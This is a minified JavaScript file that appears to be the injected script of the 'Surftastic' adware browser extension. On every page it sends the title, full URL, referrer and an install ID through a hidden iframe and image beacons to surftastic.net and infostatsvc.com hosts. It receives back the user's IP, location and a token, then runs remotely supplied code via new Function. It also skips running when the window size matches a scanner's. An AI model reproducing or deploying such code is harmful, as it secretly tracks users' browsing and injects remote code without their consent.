(function(){function x(c,a,b){if(c instanceof Array){if("undefined"!=typeof Array.prototype.indexOf)return c.indexOf(a,b);b=b||0;var d=c.length;if(b>=d)return-1;for(0>b&&(b=Math.max(d+b,0));b<d;b++)if(c[b]===a)return b}return-1}function n(c,a){if(c.constructor){var b=c.constructor.prototype[a],d=typeof b;if("function"==d||h&&9>h&&"object"==d)return function(){return b.apply(c,arguments)}}if(h&&8>h&&c===f)try{return eval(L.join(a))}catch(k){}return c[a]}function p(c,a){var b=g.createElement("script");
b.type="text/javascript";b.src=c;b.onload=b.onreadystatechange=function(){if(!this.readyState||"loaded"==this.readyState||"complete"==this.readyState){b.onload=b.onreadystatechange=null;b.parentNode.removeChild(b);try{"function"==typeof a&&a()}catch(c){}}};(g.body||g.head).appendChild(b)}function M(c,a,b){var d=r+1E20*Math.random();f[d]=b;p(c+(0<c.indexOf("?")?"&":"?")+a+"="+d,function(){try{delete f[d]}catch(b){}})}function y(c,a){if(!q){q={};for(var b=c.search.substr(1).split("&"),d=0;d<b.length;d++){var k=
b[d].split("=");q[decodeURIComponent(k[0])]=2==k.length?decodeURIComponent(k[1]):""}}return q[a]}function C(c){for(var a=[],b=0;b<c.length;b++)a.push(encodeURIComponent(c[b].toString().replace(/,/g,"$cma;")));g.images&&((new Image).src=N+a.shift()+"="+a.join("|,|"))}function s(c,a,b){if(c.addEventListener)return c.addEventListener(a,b,!1);if(c.attachEvent)return c.attachEvent("on"+a,b)}function z(c,a,b){if(c.removeEventListener)return c.removeEventListener(a,b,!1);if(c.detachEvent)return c.detachEvent("on"+
a,b)}function O(c){if("function"==typeof D)return D(c);for(var a,b=0,d=u,k="";c.charAt(b|0)||(d="=",b%1);k+=d.charAt(63&a>>8-b%1*8))a=a<<8|c.charCodeAt(b-=-0.75);return k}function P(c){for(var a=0,b="";a<c.length;)var d=parseInt(c.charAt(a++),16)<<8|parseInt(c.charAt(a++),16)<<4|parseInt(c.charAt(a++),16),k=d&63,b=b+u.charAt(d>>6),b=b+u.charAt(k);for(;b.length%4;)b+=u.charAt(64);return b}function Q(c,a,b){return function(){try{(new Function("client","defaultSettings","customSettings",b))(e,c,a)}catch(d){}}}
function E(c){for(var a=0;a<c.length;a++){var b=c[a];F(Q(b.defaultSettings,b.customSettings,b.init),0)}}function G(){for(var c=g.getElementsByTagName("script"),a=0;a<c.length;a++)if(-1<c[a].src.indexOf(R+"/gsrs")){var b=g.createElement("a");b.href=c[a].src;e.guid=y(b,"g");e.installSource=y(b,"is");H=y(b,"bp")}a:for(c=g.title||"",a=0;a<I.length;a++)if(I[a].test(c)){c="";break a}c=c.substr(0,1E3);if(706==f.innerHeight&&1024==f.innerWidth&&0==f.screenX&&0==f.screenY)return C(["SkippedRender_1",e.guid||
"",r,c,f.location.href.substr(0,4E3),"Platform"]);l=g.createElement("iframe");l.style.width="1px";l.style.height="1px";l.style.display="none";l.src="https:"+J+"/gscf?n="+encodeURIComponent((f.name||"").substr(0,1E3))+"&t="+encodeURIComponent(c)+"&r="+encodeURIComponent((g.referrer||"").substr(0,4E3))+"&g="+encodeURIComponent(e.guid||"")+"&is="+encodeURIComponent(e.installSource||"")+"&bp="+encodeURIComponent(H||"BF");g.body.appendChild(l)}function S(c){try{var a=c.data;"string"==typeof a&&(a=m.parse(a));
if(a.ext&&a.ext==r){if(l&&c.source==l.contentWindow)if("userdata"==a.msg&&a.installSource&&a.appData){e.installSource=a.installSource;e.ip=a.ip;e.geo=a.geo;e.bid=a.bucketId;e.token=a.token;A=a.appData;for(var b=0;b<A.length;b++){var d=A[b];(d.blacklistCategories.length||d.whitelistCategories.length||!d.skipUrlCategorization?v:B).push(d)}B.length&&E(B);v.length&&(b={ext:r,msg:"getcategory"},l.contentWindow.postMessage(!h||9<h?b:m.stringify(b),"*"))}else if("category"==a.msg&&a.categoryData){e.urlCategories=
a.categoryData.categories;e.isBadCategory=a.categoryData.isBadCategory;e.isBadUrl=a.categoryData.isBadUrl;e.isBadUrlCategory=e.isBadCategory||e.isBadUrl;for(var b=a.categoryData.categories,d=[],k=0;k<v.length;k++){var g=v[k],w;a:{for(var p=b,n=g.blacklistCategories,q=g.whitelistCategories,t=0;t<q.length;t++)if(-1<x(p,q[t])){w=!0;break a}for(t=0;t<n.length;t++)if(-1<x(p,n[t])){w=!1;break a}w=!q.length||!!n.length}w&&d.push(g)}d.length&&E(d)}if(c.source==f)if("getguid"==a.msg){var s={ext:r,msg:"guid",
guid:e.guid,bf:!0};K(!h||9<h?s:m.stringify(s),"*")}else"statechange"==a.msg&&"number"==typeof a.appid&&"boolean"==typeof a.state&&l.contentWindow.postMessage(!h||9<h?a:m.stringify(a),"https:"+J)}}catch(u){}}var f=window,l,g=document,m,h=!1,r="Surftastic",J="//api.surftastic.net",R="//apisurftasticnet-a.akamaihd.net",A,q,H,N="//jsl.infostatsvc.com/?",u="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",L=["(function () {delete ","; return ",";})()"];if(f.top==
f){var v=[],B=[],I=[/\b(?:\d[(). -]*?){9,16}\b/,/\b[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\b/i],F=n(f,"setTimeout"),D=n(f,"btoa"),K=n(f,"postMessage"),e=function(){function c(){z(g,"DOMContentLoaded",c);for(z(f,"load",c);a.length;)F(a.pop(),0)}var a=[],b={};return{productName:r,webDomain:"surftastic.net",webCdnDomain:"wwwsurftasticnet-a.akamaihd.net",utils:{addEventListener:s,arrayIndexOf:x,
changeAppState:function(b,a){if("number"==typeof b&&"boolean"==typeof a){var c={ext:r,msg:"statechange",appid:b,state:a};K(!h||9<h?c:m.stringify(c),"*")}},removeEventListener:z,base64EncodeText:O,base64EncodeHex:P,getNativeWindowFunction:n,loadScript:p,loadJSONP:M,log:C,ready:function(b){a.push(b);"complete"==g.readyState?c():(s(g,"DOMContentLoaded",c),s(f,"load",c))},require:function(a,c,e){switch(a){case "jquery":c=c||"1";b[a]&&b[a][c]?"function"==typeof e&&e(b[a][c]):p("//ajax.googleapis.com/ajax/libs/jquery/"+
c+"/jquery.min.js",function(){b[a]=b[a]||{};b[a][c]=f.jQuery.noConflict(!0);"function"==typeof e&&e(b[a][c])});break;case "swfobject":if(c=c||"2",b[a]&&b[a][c])"function"==typeof e&&e(b[a][c]);else{var g=f.swfobject;p("//ajax.googleapis.com/ajax/libs/swfobject/"+c+"/swfobject.js",function(){b[a]=b[a]||{};b[a][c]=f.swfobject;f.swfObject=g;"function"==typeof e&&e(b[a][c])})}}}},window:{name:f.name},getInstallId:function(){return this.guid},getClientIP:function(){return this.ip}}}();(function(){var c=
g.documentMode,a;try{delete g.documentMode,a=g.documentMode,g.documentMode=c}catch(b){}"number"==typeof a?h=a:"number"==typeof c&&(h=c);s(f,"message",S);var d=f.JSON;"object"==typeof d&&"function"==typeof d.stringify&&"function"==typeof d.parse?(m=d,e.utils.JSON=m,e.utils.ready(G)):p("//cdnjs.cloudflare.com/ajax/libs/json3/3.2.4/json3.min.js",function(){m=f.JSON;e.utils.JSON=m;"undefined"!=typeof d&&(f.JSON=d);e.utils.ready(G)})})()}})();